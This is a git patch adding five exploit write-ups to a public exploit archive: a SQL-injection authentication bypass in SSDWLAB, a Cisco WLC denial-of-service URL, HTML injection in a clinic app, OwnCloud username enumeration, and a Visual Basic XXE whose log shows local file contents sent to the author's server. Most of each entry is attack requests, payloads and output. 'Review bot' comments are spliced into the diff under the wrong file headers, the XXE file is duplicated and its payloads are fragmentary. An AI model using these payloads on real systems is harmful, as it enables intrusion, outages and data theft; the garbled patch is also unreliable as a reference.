From 6308ce9aaba48699c36a489fc956920fea8d1bb6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 5 Dec 2019 05:01:46 +0000
Subject: [PATCH] DB: 2019-12-05
5 changes to exploits/shellcodes
Microsoft Visual Basic 2010 Express - XML External Entity Injection
Online Clinic Management System 2.2 - HTML Injection
SSDWLAB 6.1 - Authentication Bypass
Cisco WLC 2504 8.9 - Denial of Service (PoC)
OwnCloud 8.1.8 - Username Disclosure
---
 exploits/aspx/webapps/47742.txt | 76 +++++++++++++++++++++++
 exploits/hardware/webapps/47744.txt | 15 +++++
 exploits/php/webapps/47741.txt | 84 +++++++++++++++++++++++++
 exploits/php/webapps/47745.txt | 40 ++++++++++++
 exploits/xml/local/47743.txt | 96 +++++++++++++++++++++++++++++
 files_exploits.csv | 5 ++
 6 files changed, 316 insertions(+)
 create mode 100644 exploits/aspx/webapps/47742.txt
 create mode 100644 exploits/hardware/webapps/47744.txt
 create mode 100644 exploits/php/webapps/47741.txt
 create mode 100644 exploits/php/webapps/47745.txt
 create mode 100644 exploits/xml/local/47743.txt
diff --git a/exploits/aspx/webapps/47742.txt b/exploits/aspx/webapps/47742.txt
new file mode 100644
index 000000000..1e3dfa242
--- /dev/null
+++ b/exploits/aspx/webapps/47742.txt
@@ -0,0 +1,76 @@
+# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
+# Date: 2019-10-01
+# Exploit Author: Luis Buendía (exoticpayloads)
+# Vendor Homepage: http://www.sbpsoftware.com/
+# Version: 6.1
+# Tested on: IIS 7.5
+# CVE : Pending
+#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.
+
+Request to the EditUserPassword Function
+
+POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
+Host: XXXXXXX.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 462
+SOAPAction: "http://tempuri.org/EditUserPassword"
+
+
+
+
+ ' or 1=1 --
+ string
+ string
+ ENG
+
+
+
+Example of Response when injection is succesfull
+
+HTTP/1.1 200 OK
+Cache-Control: private, max-age=0
+Content-Type: text/xml; charset=utf-8
+X-AspNet-Version: 4.0.30319
+X-Powered-By: XXX.XXX
+Content-Length: 421
+
+0
+
+Request to Login After Successful Request
+
+POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
+Host: XXXXXXX.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
+Content-Type: text/xml; charset=utf-8
+SOAPAction: "http://tempuri.org/Login"
+Content-Length: 406
+
+
+
+ ' or 1=1 --
+ string
+ ENG
+
+
+
+Example of succesfull login
+
+HTTP/1.1 200 OK
+Cache-Control: private, max-age=0
+Content-Type: text/xml; charset=utf-8
+Vary: Accept-Encoding
+X-AspNet-Version: 4.0.30319
+X-Powered-By: XXX.XXX
+Connection: close
+Content-Length: 422
+
+0d62cc3c0b2e3413cb8b4a85b0fa6177b
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47744.txt b/exploits/hardware/webapps/47744.txt
new file mode 100644
index 000000000..aacbc3484
--- /dev/null
+++ b/exploits/hardware/webapps/47744.txt
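Review bot: The `#Description:` line says only "injection on the SOAP function" and never names the vulnerability class, although the request bodies show a SQL-injection string (`' or 1=1 --`) in the first field of both the EditUserPassword and the Login operations; a header line such as `# Vulnerability Type: SQL Injection (user field of the EditUserPassword and Login SOAP operations)` would tell a reader which input the vendor has to parameterize. `# Date: 2019-10-01` does not match the 2019-12-04 recorded for this entry in files_exploits.csv, and the same header-versus-index mismatch exists for 47744 (2019-11-25), 47741 and 47745 (2019-11-29) and 47743 (2019-12-03); one side should be corrected so the dates agree. `# CVE : Pending` is left as-is in this commit, so the entry has no tracking reference yet. "succesfull" appears twice and should be "successful".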
@@ -0,0 +1,15 @@
+# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2019-11-25
+# Exploit Author: SecuNinja
+# Vendor Homepage: cisco.com
+# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
+# Version: 8.4 to 8.9
+# Tested on: not applicable, works independent from OS
+# CVE : CVE-2019-15276
+
+# Exploit PoC:
+
+https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'>
+
+# Firing this code will cause the system to reload which results in a DoS condition.
\ No newline at end of file
diff --git a/exploits/php/webapps/47741.txt b/exploits/php/webapps/47741.txt
new file mode 100644
index 000000000..8e9720a62
--- /dev/null
+++ b/exploits/php/webapps/47741.txt
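Review bot: `# Version: 8.4 to 8.9` contradicts the title, which names 8.9 alone; either the title should carry the affected range or the Version line should state the release actually tested. `# Software Link:` points at the Cisco advisory for CVE-2019-15276 rather than at the software, so the reference belongs on its own line, e.g. `# Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos`, and if that advisory lists fixed releases a one-line `# Fixed in:` summary would let operators see which upgrade closes the issue. The closing line calls the PoC "this code", but the PoC is a single URL; `# Opening this URL causes the controller to reload, which results in a DoS condition.` is more accurate.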
@@ -0,0 +1,84 @@
+# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
+# Software : Online Clinic Management System
+# Version : 2.2
+# Vulernability Type : HTML Injection
+# Vulenrability : HTM Injection
+
+# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
+# add disase symptom, patient and appointment section.
+# payload: asd
+
+# HTTP POST request
+
+POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+POST /clinic/disease_symptoms_view.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------325041947016922
+Content-Length: 1501
+Origin: http://10.10.10.160
+Connection: close
+Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
+Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
+Upgrade-Insecure-Requests: 1
+
+ -----------------------------325041947016922
+Content-Disposition: form-data; name="current_view"
+
+ DV
+-----------------------------325041947016922
+
+Content-Disposition: form-data; name="SortField"
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SelectedID"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SelectedField"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SortDirection"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="FirstRecord"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="NoDV"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="PrintDV"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="DisplayRecords"
+
+all
+-----------------------------325041947016922
+Content-Disposition: form-data; name="disease"
+
+asd
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="symptoms"
+
+asd
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="reference"
+
+-----------------------------325041947016922
+Content-Disposition: form-data; name="update_x"
+
+1
+-----------------------------325041947016922
+Content-Disposition: form-data; name="SearchString"
+-----------------------------325041947016922--
\ No newline at end of file
diff --git a/exploits/php/webapps/47745.txt b/exploits/php/webapps/47745.txt
new file mode 100644
index 000000000..e9e0e5536
--- /dev/null
+++ b/exploits/php/webapps/47745.txt
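Review bot: The capture under `# HTTP POST request` opens with two request lines: `POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1` with its own Host and User-Agent, immediately followed by `POST /clinic/disease_symptoms_view.php HTTP/1.1`. The first three lines belong to a request against a different application (the Cookie line also carries an `online_inovicing_system` session), so they should be dropped to leave a single well-formed request. The header carries two near-duplicate, misspelled fields, `# Vulernability Type : HTML Injection` and `# Vulenrability : HTM Injection`; one `# Vulnerability Type : HTML Injection` line suffices, and "disase" in the section list should be "disease". In the multipart body the `SortField` and `SearchString` parts have no blank line between their `Content-Disposition` header and the following boundary, which may be an artefact of how the request was copied and is worth checking against the original capture.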
@@ -0,0 +1,40 @@
+# Exploit Title: OwnCloud 8.1.8 - Username Disclosure
+# Exploit Author : Daniel Moreno
+# Exploit Date: 2019-11-29
+# Vendor Homepage : https://owncloud.org/
+# Link Software : https://ftp.icm.edu.pl/packages/owncloud/ (old version. Download at your own risk)
+# Tested on OS: CentOS
+
+# PoC:
+# 1. Create an account in OwnCloud
+# 2. Intercept connection with Burp
+# 3. Share a file, typing anything
+
+---------------------------------------------------------
+4. Burp will capture this request
+
+GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
+HTTP/1.1
+Host: XXXXXXXXXXXXX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+requesttoken: XXXXXXXXXXXXXXXXXXX
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: https://domain.com/index.php/apps/files/
+Cookie: XXXXXXXXXXXXXXXX
+---------------------------------------------------------------------
+
+5. Send to Repeater
+
+6. Change GET parameter to THIS:
+
+GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
+HTTP/1.1
+
+
+7. Return valeus will be a JSON with all username informations
\ No newline at end of file
diff --git a/exploits/xml/local/47743.txt b/exploits/xml/local/47743.txt
new file mode 100644
index 000000000..bf47458f4
--- /dev/null
+++ b/exploits/xml/local/47743.txt
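Review bot: Both request lines are wrapped, with `HTTP/1.1` pushed onto a line of its own, and the User-Agent value is split the same way, so the capture as written is not a well-formed request; the wrapped pieces should be rejoined, and the note should say what the asterisks around the `search` value denote, since as written they read as highlighting rather than as part of the query string. Steps 1–3 are `#` comment lines while 4–7 are plain text; keeping all seven in one format would be cleaner. `7. Return valeus will be a JSON with all username informations` should read `7. The response is a JSON document listing all usernames.` The header keys (`Exploit Date`, `Link Software`, `Tested on OS`) also differ from the `Date` / `Software Link` / `Tested on` keys used by the other files in this commit.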
@@ -0,0 +1,96 @@
+# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2019-12-03
+# Version Software : 10.0.30319.1 RTMRel
+# Vendor Homepage : https://www.microsoft.com/
+# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
+# Tested on OS: Windows 7
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software Microsoft Visual Basic 2010
+5) Drag the file (.xml) in a VB project
+6) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+
+
+
+%dtd;]>
+&send;
+
+[+] Payload.dtd :
+=================
+
+">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
+
+
+Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt
+
+# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2019-12-03
+# Version Software : 10.0.30319.1 RTMRel
+# Vendor Homepage : https://www.microsoft.com/
+# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
+# Tested on OS: Windows 7
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software Microsoft Visual Basic 2010
+5) Drag the file (.xml) in a VB project
+6) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+
+
+
+%dtd;]>
+&send;
+
+[+] Payload.dtd :
+=================
+
+">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 29a3b9ff1..a730dbf47 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
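Review bot: The file body is duplicated: everything from `# Exploit Title:` through the final `200 -` log line appears twice, separated by a stray line holding the file's own name (`Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt`); the second copy and the filename line should be removed. The steps say `3) Create file Payload.dtd` while the server log records the fetch as `GET /payload.dtd`; the two names differ in case, which is harmless on the Windows 7 host named in the header but would not match on a case-sensitive server, so the step and the log should use the same spelling. The `[+] XXE.xml` and `[+] Payload.dtd` sections show only fragments (`%dtd;]>`, `&send;`, `">`, `%all;`), so a reader cannot confirm from this copy that the listing matches what the log shows being served; worth re-checking the stored file against the author's original.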
@@ -10824,6 +10824,7 @@ id,file,description,date,author,type,platform,port
 47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
 47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
 47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
+47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42051,3 +42052,7 @@ id,file,description,date,author,type,platform,port
 47737,exploits/php/webapps/47737.txt,"Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting",2019-12-03,"Cemal Cihad ÇİFTÇİ",webapps,php,
 47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
+47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47742,exploits/aspx/webapps/47742.txt,"SSDWLAB 6.1 - Authentication Bypass",2019-12-04,"Luis Buendía",webapps,aspx,
+47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
+47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,